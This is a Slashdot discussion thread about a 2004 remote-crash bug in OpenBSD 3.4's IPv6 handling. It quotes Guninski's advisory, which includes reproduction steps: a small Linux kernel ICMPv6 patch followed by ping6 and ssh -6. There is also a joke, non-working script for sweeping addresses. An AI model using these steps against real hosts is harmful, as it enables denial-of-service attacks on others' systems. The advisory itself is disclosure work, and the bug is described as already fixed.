Slashdot Mirror
Remotely Crash OpenBSD
*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
I think it's time to upgrade to windows.
I am defenseless. Use your button. Mod me down with all of your hatred.
Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?
--
Society has traditionally always tried to find scapegoats for its problems. Well, here I am.
I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...
No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.
Join moola.com, play games to earn money.
I believe that you must roll your own Linux kernel or network stack in order to send the (correct? bad?) commands that cause openBSD's crash to occur.
Open Your Mind. Open Your Source.
Actually you need to patch the linux kernel or write you own network stack to DO the remote attack against an OpenBSD box.
At least that's the way I read it.
chown -R us.
I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.
What's a sane admin to do?
No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.
"People that quote themselves in their signatures bother me" - athakur999
They are saying that to exploit would require a patch to the Linux kernel.
I like your way better though!
You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?
Remote openbsd crash with ip6, yet still openbsd much better than windows
i ng in this document may change without notice.
:
/* we coulnd't care less */ //joro
i net6/ip6_output.c e t/tcp_output.c?sortby=date
Systems affected:
tested on openbsd 3.4
not clear about netbsd
freebsd not vulnerable
Risk: Medium
Date: 4 February 2004
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/obsdmtu.html
Anyth
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
and there is a listening tcp port.
quoting de raadt: "it is just a crash."
remote crash which screws the kernel.
unknown whether this may be exploited for code execution.
Details:
The problem is triggered by setting small ipv6 mtu and then doing tcp
connect.
How to reproduce:
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
Workaround:
It is believed that openbsd current is not vulnerable.
netbsd current also seems to have related changes.
check:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netin
Vendor status:
open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200
Georgi Guninski
http://www.guninski.com
(On the other hand, as everybody knows, IE is an integral part of windows and could never work on Solaris, HP-UX or Mac OS, just as it would be impossible to create a Windows version without IE, like WinXP-PE)
Programming can be fun again. Film at 11.
However, I guess patching a BSD kernel should work as well :-)
The Tao of math: The numbers you can count are not the real numbers.
So if you patch YOUR kernel and/or roll YOUR own network stack, then you could be vulnerable to a remote attack.
No, your attacker has to patch his linux kernel or roll his own network stack in order to crash you. You don't have to do a thing. RTFS!
c++;
Great, now when I try and check the linked article and cant get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.
Hell, who knows, maybe this one is Google's fault too.
...my BSD is dying...
I'd rather have a box crashed than a box rooted. But maybe I'm just funny that way.
Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lighting strikes, seatbelt failures, and choking to death on my turkey dinners.
I was talking with some of my colleagues in network security this morning about the OpenBSD exploit and means by which future exploits may be avoided. One suggestion which was raised was that the OpenBSD 'ports' system may be to blame. After all, if you need to add packages on a BSD system, 'ports' must be opened, and when ports are open on firewall boxes, bad things happen. Debian's apt-get system for example does not require 'ports' to work properly, and therefore may be immune from this type of exploit. Is this a possible solution? I look forward to hearing the community's responses!
You appear to be missing the whole problem.
This is a problem with OpenBSD's IPv6 implimentation where if you send bad data, it looks like sending something larger then expected, then the kernel will crap out on you.
The rolling your own kernel OR build your wn network stack is whats required for the REMOTE host to send these bad packets to your system and crash it.
On an unrelated note, its a little disturbing to see this as i just rebooted a OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.
What I would say is most suspect is Theo's reaction "Its just a crash." You would hope someone who started a project to create the worlds most secure OS would actually care there might be a problem.
"I use a Mac because I'm just better than you are."
No, the BSD has to patch the ATTACKERS IPv6 to crash THE packet linux victim ROLL YOUR OWN!
regarding the second paragraph...YOU HAVE TO BE KIDDING!
I would mod this FUNNY...not insightful.
kay, give us the IP address of your BSD box while I patch my Linux kernel.
the difference is they fix it in a timely fashion...
Kyle
http://www.unlogikal.net/
Ha ha ha, very funny.
Slashdot: Failed Car Analogies. Amateur Lawyering. Anecdote Battles.
Well, I guess Theo got hit by the reductionism bug...or perhaps what he means is "At least the system goes down rather than being compromised"
There are days on this network where I wish the latest MS vulnerability was just a crash. 'member those great days? It may not even get reported because it would be such low key news.
Anyway, for this remote takedown to work, you also have to be running an IPV6 stack, right? At the moment that's a pretty small segment of techies.
Note: I am not an OpenBSD apologist... I am a Mac apologist.
-- The unsig...
(Moderators: The BSD ports system has slightly less than nothing to do with TCP/IP ports being open, closed or missing on firewall or other machines. It's just a homonym (no, it has absolutely nothing to do with gays).)
Money for nothing, pix for free
After all, who needs a bug to d0s someone from the face of the earth?
/.
Exactly. All it takes is a fractal on the Google homepage or a link from
Cheers
Stor
"Yeah well there's a lot of stuff that should be, but isn't"
Hey but is only a crash nothing at all to worry about...
:
/* we coulnd't care less */ //joro
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
#!/usr/bin/python
import popen2,string
def cmd_execute(cmd):
p = popen2.Popen3(cmd)
p.wait()
return string.strip(p.fromchild.read())
#kill everybody
for a in range(0,255):
for b in range(0,255):
for c in range(0,255):
for d in range(0,255):
execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)
OK, that just piqued my curiosity. I am very sorry it did, but it did. People, do NOT follow that link in the grandparent post. Just take my word for it. Don't. No amount of curiosity is worth seeing that.
Money for nothing, pix for free
good thing nobody uses IPv6 and never will! :-)
Not log ago there was an article about not only how ipv6 isnt needed, but that since its 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?
I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isnt it trivial to avoid the same early mistakes in ipv6. Does this particular problem have a ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?
Does anyone have any insight?
He was talking about having to modify a linux kernel in order to generate the traffic to crash the BSD kernel...
Thinking outside my Head
I think what he means is "its just a crash rght now dont bother me untill you can show an exploit and have fixed it." It says right in the article they don't know if it will allow a system to be compromised, and it seems that until someone else checks that, he doesn't care. I was just saying that a crash might not be a crash, but Theo's attitude is a little lax in aproching the situation considering that they say right on bootup to OpenBSD the PROACTIVLY secure unix system. Not all that proactive when you don't take action to actually prevent a problem and just wait for someone to give you step-by-step how to comprimise a system.
"I use a Mac because I'm just better than you are."
What am I missing here?
Enough good sense to RTFA, or at least properly fake as though you had.
LK
"Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
mod -1 for being a troll post, openBSD is alive and well... and its not the linux kernel, its the BSD kernel you dumbshit.
Maybe you don't understand, but there has to be an attacker. You have to have a specific modification in the linux kernel of the linux machine (attacking machine) to successfully attack the openbsd machine (victem). Probably you could set up a FreeBSD machine, or even another OpenBSD machine to do the attack. Just a linux machine was used to attack in the example.
Did you even RTFA?
What would you rather Theo say? "OMG OMG OMG!!! Its a CRASH!!! Oh dear god! Quick, run around like headless chickens!!!!! Someone better get this patched pronto!!" or "Its jsut a crash." and get on with the patching?
Seriously, its getting fixed. You think his reaction would change the pace with which the bug gets fixed?
Ok so why the hell dont they just add a few more octets onto a ipv4 address? afraid to rewrite a.b.c.d as a.b.c.d.e.f?
lol... I crack me up
No. They use very different kernels, though a lot of code is shared among them.
So maybe you need to patch a Linux OS to get some help sending broken ICMPv6 packets, or maybe you just need to do creative writing to the Ethernet. But you could certainly get MS-DOS to let you do it, and presumably also Windows.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
And buffer overflows that get data that isn't crafted are "just a crash" as well.
But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?
Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?
It's fine to have security as your focus. In fact, that's great. What turns me off is the attitude that OpenBSD is axiomatically more secure. The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code." And then they should look at how this bug got in there, and figure out how they can make sure that kind of bug doesn't happen again.
IMO they should also get rid of this ridiculous "no (well, one) (remote) (root-privilege) holes (in the default install) in the last 7 years!" business. It's just too confrontational; how can we help but think of them as another "team" trying to beat us at the security "sport"?
Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.
I don't want knowledge. I want certainty. - Law, David Bowie
Dear lord...
Are you making use of IPV6? While it is possible I don't really know many people that are, so perhaps you could just not use the IPV6 bindings for now until the problem blows over?
::1
There you go. Have fun.
A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.
After all, who needs a bug to d0s someone from the face of the earth?
I dunno, man, winnuke was a big problem on our campus in 98(?). It's so much easier to crawl through a block of IPs sending a few packets than to DOS the whole netblock. You can even do it from a modem in a few minutes.
Hardly..
a simple raw socket will do.
The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code."
It was fixed before you even heard about it. Get over yourself.
Haida Manga
Except it's not an exploit, it's a DoS ... and it's only a problem for those running IPv6 with a publically accessible IPv6 address.
Yeah, there's a dangerous problem there.
God, the intelligence on Slashdot has certainly dropped in the past few years.
...IPv10 (IPX!)? 4 + 6... [woo lame version # advancement schemes!] then you get to put an "X" in the name and everyone upgrades faster... maybe we could even work in an XML basis; think of the interoperability!
Global symbol "$deity" requires explicit package name at line 2. - If only $scripture started "use strict;"
a few months back child porn was posted and nothing was done
I've read a bunch of posts comparing this "possible" hole in OpenBSD to those in MS. There's NO comparison! I bet Theo and the OpenBSD developers are already working on a fix. Actually, they probably already have one. With MS, it takes much, much longer! And sometimes, the "fixes" that MS so-called developers come up with break something else.
yes, when I saw this and noticed people commenting on the "Securer than tho" stance taken, my immediate thought was
"Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the for, then hasnt hte OpenBSD project succeeded in its goal?"
I'm glad they fixed it..
e ti net6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h i ne t/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date& f=h
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/n
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/net
[alk]
The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.
You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.
For extra kicks, blind taste a Tawny against a Madeira.
Enjoy.
I have something in common with Stephen Hawking...
I have made a mirror of the page, as it is becoming exceedingly slow.
|/usr/games/fortune
My ip address is 127.0.0.1. Knock yourself out.
It's Linux, damnit! Pay no attention to renaming attempts by self-aggrandizing blowhards.
now, how many times does this happens to your favorite OS vendor and their favorite web browser???
from the openbsd CVS:
Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
Branch: MAIN
CVS Tags: HEAD
Changes since 1.81: +100 -18 lines
Diff to previous 1.81 (colored)
strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei
This guy found a crash in qmail, too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize. In fact I'm not sure DJB reacted to the news at all.
OpenBSD was branched from NetBSD well before IPv6 support came out. The kernels have diverged quite a lot since then. There is no enhanced risk for NetBSD. I doubt if other systems are vulnerable, just because of the fact that knowledge about security and DOS holes are shared pretty freely between the groups, and we haven't heard about FreeBSD or NetBSD.
you would HAVE to be connected to the 6bone to get a ipv6 packet. Or have the attacker on your own network running ipv6 and trick you into becoming configured onto the same /64 prefix....not many of us have a ipv6 tunnel (thank you hurricane electric). So this affects very very very few people. you know who you are, and are patching now.
--jboss
The posters point is taken though... IMHO Theo is an ass. I was in no way surprised when the funding they were promised was pulled moments before it was to be paid. He honestly seems to go out of his way to make people feel bad, and himself feel better.
...
A coworker of mine was "graced" with a personal email from Theo, in which he complained that adding new features to kernels was a "stupid new meme" without actually having read the email about what my coworker was doing.
Although I do run Openbsd... I attribute its quality to the dedicated coders who work relentlessly to find little tiny holes.
The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.
OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.
Fixed? really? Could you point out on the errata page where this is even mentioned, let alone patched?
"I use a Mac because I'm just better than you are."
"our linux crashed your openbsd!"
If you think of going to page linked by the grand-grand-parent, dont.
:
:
... sigh, why do I even make the effort?)
I did out of curiosity
If your curious, read this
DISCLAIMER : Even the text version might be highly offensive to some, but I hope that this will kill the curiosity of some people.
The link is one large image composed by multiple sub-images, there is (ROT13):
- Ghotvey
- Tbngfr
- fbzr fgenatr irel htyl intvan-vasrpgvba
- n guvat gung ybbxf yvxr n urnq ghearq vafvqr bhg
- n yrt jvgu gur fxva evccrq bss
- n navzr cvpgher bs n tvey jvgu na bcra fgbznpu
- guerr irel byq zra univat frk
- n jbzna rngvat cbbc pbzvat serfu bhg bs fbzrbarf nffubyr
- one more pictures I dont remember (and I WONT go there again, once was twice too much)
And I can just agree with the parent
NO AMOUNT OF CURIOSITY IS WORTH SEEING THAT.
(But I know that your curiosity will win anyway
Now, where can I get a mind-altering drug to forget what I just saw, that I just saw it and that I even remotly know of it existence?
I have discovered a truly remarkable proof for my post which this sig is too small to contain.
While possibly not a direct security threat, remote crash exploits are obviously highly disruptive and in today's networked economy, highly costly in terms of lost productivity.
While a crash exploit doesn't guarantee it, it usually means that a root exploit is possible.
Think about it: You got the machine to execute code it shouldn't have executed (or overwrite something 'way important it shouldn't have overwritten, or with a value it shouldn't have written.) This usually means you changed the program coutner to some random value. That typically happens as a result of overwriting a return address by a buffer-in-the-stack overflow. Now if you can just get the program counter to point to code you supplied in the same packet, and put the right code there, you're in.
There are other ways this can happen (for instance: overwriting an index into a function table with an illegal value). But many of these similarly lead to root exploits.
A crash means you killed, not just a task, but the whole system. In a system as robust as BSD this usually means that the code that was corrupted by the exploit was running at a kernel permission level. So if you can take it over you can get it to give you any permission you want.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
What does "cogitoergosum" mean?
I remember the days in the late 80s and early 90s when it was (which is how I was able to afford that case of Fonseca '77)... I was a pig in shit back then.
I have something in common with Stephen Hawking...
It should be amusing and rare to hear about these holes in ANY OS. OpenBSD should get more press than Windows for holes, after all openBSD has so few that you can safely assume the people using openBSD don't bother to pay attention, while those using Windows have to pay attention. Therefore we need extra effort to get the attention of OpenBSD users on the rare times it is needed.
Saddly it doesn't work that way. Windows users despite having lots (by comparition) of holes never patch, while openBSD seems to be reserved for only the paranoid who patch often.
Either way, openBSD deserves the attention they get. If I were swear everyone who knows me would talk about it, even though most of them think nothing of swearing everyday (or so it seems). Once you build (like me) an expectation it is interesting when you violate it, even though you did something that is everyday.
First of all it's CowboyNeal.
Secondly, there's nothing wrong with his statement. In order to exploit the bug, you need to be running a patched Linux kernel to send the necessary packet.
Remote desktop on Linux? Uh, sure.
Wow! You've got a ton of porn on there!
What crackpipe have you been using? It must greatly enhance the smoking experience. The funding was not pulled "pulled moments before it was to be paid," the funds were already greatly used. There was about three months left before the funding from POSSE was ended. Theo does not seem like an ass to me, he does instead seem like someone that dismisses stupid shit that random people say because he has better things to do.
I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
I thought Theo's comment sounded really arrogant, too. But you might note that the author quoted it with no context, so who knows whether it was in real life.
Now as for Microsoft, if MS patched something within... no, wait, it was patched before the bug came out... anyway, we'd cut them a bit more slack.
I hereby place the above post in the public domain.
We are still running everything on ipv6. Now we have had a couple sites that we've had to move to FreeBSD servers due to the lack of SMP support in OpenBSD and needed the extra power. However, overall, I've had good luck with OpenBSD. Its the lack of support for SMP and other features that keep me from an extremely large scale deployment...
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
To quote Theo, 'it is just a wardrobe malfunction.'"
Cogito ergo sum:
Rene Descartes, Discourse on Methode, Part 4:Reposted 'cause I could use the mod points.
What does "cogitoergosum" mean?
Cogito ergo sum:
Rene Descartes, Discourse on Methode, Part 4:A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.
Troll?!? It was humor, you insensitive clod.
You got us. It was fixed about two and a half hours after you heard about it...
p =R eply&threshold=1&commentsort=0&tid=172&mode=thread &pid=8196065
http://bsd.slashdot.org/comments.pl?sid=95689&o
What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recally it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break-in, you crash, and now you're in a more secure state (off) than you were when they attacked you.
As a sysadmin of a college network, "just a crash" *really* helped me.
I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.
Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.
Just a crash, saved several boxes. By contrast, accessible linux machines, privelege escalation - root exploit. All over.
Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.
Well, I didn't do my homework, you are right that the POSSE money wasn't all pulled suddenly. I do recall reading some stories that seemed to phrase it that way on the internet, perhaps I misread.
:D
I do stand by my statement though... (concerning the assholitude).
was your firewall would you rather have it rooted and used by one person/group or your box down and either:
internal network exposed, or
your business of the air
The Singularity is closer than you think
Quant
and if you're counting the number of remote root exploits, you can use a 2 bit register with a signed value.
When someone might yell at me, it has to be OpenBSD.
a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...
...
yeah right
Wasn't the BSOD just a crash?
[SIG] Remember Mattel handheld games?
"very easily executed DOS" = finding ipv6 obsd box and the ability to send ipv6 packets to said box. right?
vodka, straight up, thank you!
Basically, Georgi Guninski found a way to cause the current child process of 'qmail-smtpd' to abend -- this is not a DoS, as it only affects your child SMTP session, and is likely not possible in an RFC-compliant message.
Technically the issue is the use of a signed integer as a counter when it is also used as an index into the array (containing the current line?). If the counter is incremented to the point that it "wraps around" (technically overflows, but not in the same sense as a buffer overflow), then when the counter is used as an offset into an array, it causes a "segment violation" fault.
Because the counter is used as an offset into an array for the purpose of reading the value of a byte, and the process is killed as soon as it tries to access memory outside of it's segment (SEGV), this is inherently non-exploitable for privilege escalation.
As I said, it's silly, is only an issue because the rest of DJB's code is so clean you could eat off it, and as Georgi Guninski says,
I do not deploy Linux. Ever.
Heres what I saw in the advisory:
ping6 openbsd
ssh -6 openbsd
Notice the ssh -6? Now how many people do you know will run an ssh server as tcp6? He will have to be really interested in ipv6 and run a couple of daemons and run an ipv6 home network.
So if he's mucking with ipv6, for one hes not running critical servers and has critical data on his server that needs to be 99.999% available.
Secondly theres really not many people who would much with ipv6 in the first place.
So I think OBSD is still pretty much secure and this bug shouldnt harm OBSD's image. Bugs appear in OSes all the time and this one, with all the press its getting will do much less damage to OBSD servers around than the bugs for Windows and other Unixen will.
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
Dude relax. Think about it, lots of machines have IPv6 running now. What there are NOT a lot of are IPv6 enabled routers. Forilla, if the packets can't get to your boxen, they can cause your boxen undue grief. How many IPv6 enabled routers do YOU have leading to your networks?
It's not a good thing that this happened... but theo is not incorrect in being a bit dismissive of the exploit.
Given your Zelousness you probably don't use OpenBSD. If that's the case then your one less system to patch.
0p3|/| 8$D 1Z L33T
However, keep in mind that there are quite a few areas in (all?) BSD-derived IP stacks where a seriously malformed packet will cause the kernel itself to throw up it's hands and call panic("WTF?!?").
I've found that just about any system will eventually panic if you sic ISIC at it from within the same subnet.
Cool OpenBSD kernel panic messages:
or the elegantly simple:
I do not deploy Linux. Ever.
Ummm... I'd be more worried the author quoted him out of context if Theo didn't come off as obnoxious.
I have a modifier to add six points for troll posts, so this actually gets *modded up* to five points on my computer. And at least you got what you asked for. A lot of people think they're trolling and ask for a troll mod, but they get flamebait. Dumbasses.
Yeah, you're not going to see a worm that infects Linux hosts, patches their kernels, recompiles, and executes these commands against OpenBSD.org...
I get it now. We leave. You guard the prince. The prince has to patch his kernel.
graspee
Just use VPN through it and it comes down with the slightest traffick between the VPN server and client
"Fighting terrorists with millitary might is like killing a mosquitor on your Dad's forehead with a rifle."
I think that it means that you need a patched Linux kernel in order to generate and send the borked packets that cause the crash on an OpenBSD box. The modded network stack is used on a Linux machine to crash an OpenBSD machine.
I beg to differ.
// hdw
Removing unused features/services/functions does add to your overall security and system stability.
If you don't use IPv6 then taking it out of your kernel is a good move.
But I agree to a point, just rampaging thru you kernel config removing fluff isn't security.
Done in a sane way it's an addition to security and stability.
Executive Pope (small) Kallisti Engineering
I'm surprised the crash made slashdot, but not the root exploit in BSD that was posted to BugTraq at the same time. To wit:
http://www.securityfocus.com/archive/1/352733
The response from TdR shouldn't be
Ok, tell me *WHY* it should be any different. And
when you have figured out one or more reasons why it
should be anything different, match those reason to
the list here:
http://www.openbsd.org/goals.html
If you get any matches, please post them here afterwards.
It is not the goal to conquer all unices, nor to
please you or me or any other users. Neither is it
a goal to produce comments that can't be misinterpreted
out of context either. So what if Theo is an asshoel,
so what if he is blunt, uncharismatic, unfriendly
or not on your list of likeable persons? He doesn't
care for what you like, until you start producing
workable code. And neither do I, but I don't run a
project like that. He does. And he can say what goes
and what doesn't. You (and others) need to figure
out really quickly that it's not about you. They
don't do all that work for you, it's for _them_.
It may come as a shock for you to realise it, but
if you slam the door and never return it wont matter
to them. Really. If the (true - as of now) statement
offends you so much, by all means go somewhere else.
It will not matter. It will not change any facts,
and it will not change openbsd, and it will not change
the trackrecord of openbsd.
-- I'm as unique as everyone else.
What, writing raw ethernet packets won't work?
tasks(723) drafts(105) languages(484) examples(29106)
What about raw sockets?
Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio fro security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.
Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.
It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.
I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.
All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.
If they want a system with users, it helps to not turn then away by being rude and dismissive.
Users are good for lots of goals, because users find, report, and sometimes fix bugs.
If they want cooperation from other OS/app writers, it helps to be less competitive. I know these aren't *directly* on the list, but surely they contribute indirectly to the goals.
Just as you defend Theo's right to say things like that, should I not also have the right to call him on his attitude?
Is there any way that we could prod Santana to bring his binary patches up to date for 3.3 i386 when the patch is released?
I've already emailed him that I'd send him $50.
...the documentation advises against building your own kernel unless you have a very good reason. They won't support you, either (not that their support will solve all your problems).
C'mon, how many people are running IPv6? I'm sure both of them have upgraded to -current already.
At least mafia-owned pizzarias make excellent pizza. Compare to Bill Gates.
http://bsd.slashdot.org/article.pl?sid=04/02/05/20 56234
i net6/ip6_output.c
Remotely Crash OpenBSD
Posted by CowboyNeal on Thu Feb 05, '04 22:49
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net
CVS log for src/sys/netinet6/ip6_output.c
Revision 1.82 / (download) - annotate - [select for diffs] , Wed Feb 4 08:47:41 2004
Get it?
Haida Manga
Forgetting corporate inertia for a moment, you have the choice of hurried, not thoroughly tested, patches; or waiting weeks while they test it thoroughly.
Think of the sheer number of test cases. You've got how many different versions of Windows still supported. Multiply that by all the apps MSFT sells (e.g.: Office) and all the apps that major corporations also run (e.g. Oracle). Multiply by a few hundred hardware platfroms.
I'm not particulary fond of MSFT myself, but complaining about the speed AND quality of their patches reflects poorly on you.
I think, therefore I am.
Now, if you'll excuse me, I have backups to corrupt.
Doesn't that violate the first rule of security: restrict physical access? If anyone can walk in and access the firewalls/routers, they could do whatever they want to them, OpenBSD or not.
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
I see. Interesting. :)
"Those who consume the bulk of goods are those who make them. We must never forget this secret of our prosperity."
There is a difference between:
"He should do X" and
"I think he shoudl do X to achieve Y".
Especially when Y isn't on the goals.html page.
Yes, more users would seem logical, but it's not one
of the goals. Reread it and you'll see.
-- I'm as unique as everyone else.
Every added feature adds risk for bugs.
// hdw
If I don't use a feature I turn it off.
In this case I know that I'm not using IPv6, but there might very well be IPv6 traffic around my firewalls.
Even if noone can connect over IPv6, it doesn't mean that IPv6 packets will not be processed by my kernel.
Can you really say that disabling IPv6 support in the kernel does not affect security?
The code standard in OpenBSD is very high, but it's not bug free. And a bug in disabled code is a bug that can't bite me.
And I don't 'gank' anything out, I use the configuration file exactly as it's supposed to be used.
Everytime there's a new release I reinstall my build server, then I go over rc.conf, sysctl.conf and kernel conf adding the options I need, removing the stuff I don't need and build my internal release.
Executive Pope (small) Kallisti Engineering
And a bug in disabled code is a bug that can't bite me. How about the bugs you might create by removing or disabling stuff without careful consideration?
Uh?
// hdw
The bug I create by switching an option in a config file from on to off?
The point of having options in the config file is that you're supposed to config the kernel to your needs.
Switching unused options off is careful consideration.
Executive Pope (small) Kallisti Engineering
See Daniel Harmeier answer.
Basically OpenBSD releases are supported one year (2 releases). i.e. you have to upgrade only any other release. In fact a release is supported for 13 months to give users a 1 month window to upgrade.
At the time of the telnetd exploit (July 2001) the oldest supported release was 2.7 or 2.8 and telnetd had been disabled from the default install between 2.5 and 2.6. So if you used a supported release you were safe. Since upgrades are free and take about one hour there's no reason not to do it once a year...
Um, maybe you haven't seen that Microsoft has been making IE and Outlook Express for Mac since version 3 of Internet Explorer and Outlook Express 4.5. IE is also included in MacOS X installs.
I use to be indecisive, but now I'm not so sure.
But the Mac port of IE is a different codebase.
r l= /archive/en-us/dnarwbgen/html/msdn_unixwin32.asp
Here is an MSDN article from 1998 that tells how MS did it.
http://msdn.microsoft.com/archive/default.asp?u
They used MainSoft's Win32 layer for Unix.
-- Jason
The ipv6 loopback address is ::1. The v6-mapped version of the ipv4 loopback address is ::ffff:127.0.0.1. Why do I get the feeling that most people aren't really thinking ipv6 here?
#define X(x,y) x##y
Peter Cordes ; e-mail: X(peter@cordes ,